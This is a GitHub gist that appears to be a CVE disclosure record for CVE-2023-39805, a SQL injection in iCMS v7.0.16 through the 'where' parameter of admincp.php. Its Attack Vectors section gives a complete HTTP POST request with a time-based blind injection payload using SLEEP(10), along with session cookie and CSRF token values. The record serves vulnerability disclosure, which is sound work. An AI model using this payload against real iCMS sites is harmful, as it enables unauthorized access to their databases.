Skip to content

Instantly share code, notes, and snippets.

@ChubbyZ

ChubbyZ/CVE-2023-39805

Created August 9, 2023 04:29
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save ChubbyZ/3ad434bd5fc2ab1242dd32500384cfb5 to your computer and use it in GitHub Desktop.
Save ChubbyZ/3ad434bd5fc2ab1242dd32500384cfb5 to your computer and use it in GitHub Desktop.
Download ZIP
CVE-2023-39805
Raw
CVE-2023-39805
[CVE-ID]
CVE-2023-39805
------------------------------------------
[Description]
iCMS v7.0.16 was discovered to contain a SQL injection vulnerability
via the where parameter at admincp.php.
------------------------------------------
[Vulnerability Type]
SQL Injection
------------------------------------------
[Vendor of Product]
icmsdev
------------------------------------------
[Affected Product Code Base]
icms V7.0.16 - V7.0.16
------------------------------------------
[Affected Component]
icms<=V7.0.16
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Information Disclosure]
true
------------------------------------------
[Attack Vectors]
POST /icms/admincp.php?app=database&do=query&frame=iPHP&CSRF_TOKEN=fe334f6fgxSmDHDpZeekNtohnt-hBYXBAOJkd5xXq_XXz5vaYOwEoS_nJrEdZo26EJVC0fA0SkLpfBFFzcE4ly18oxAoBMoCTr22qJ8 HTTP/1.1
Cookie: iCMS_ADMIN_AUTH=23f0a4caAp2o-gYF7T1PFGTY0fdLZd43ZdGHuQY1NnyOjOUDHZxyC_CewgaX5uR1iNHfEz_Pj20qTaPC_NZlv9CKoxpPtJ80fBz7nbiMensa6tkGlbYrpw; XDEBUG_SESSION=11807
field=tkd&pattern=123123&replacement=1231321&where=where+id=1+AND+(SELECT+*+FROM+(SELECT(SLEEP(10)))testsql)
------------------------------------------
[Has vendor confirmed or acknowledged the vulnerability?]
true
------------------------------------------
[Discoverer]
chubby
------------------------------------------
[Reference]
http://icms.com
http://icmsdev.com
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment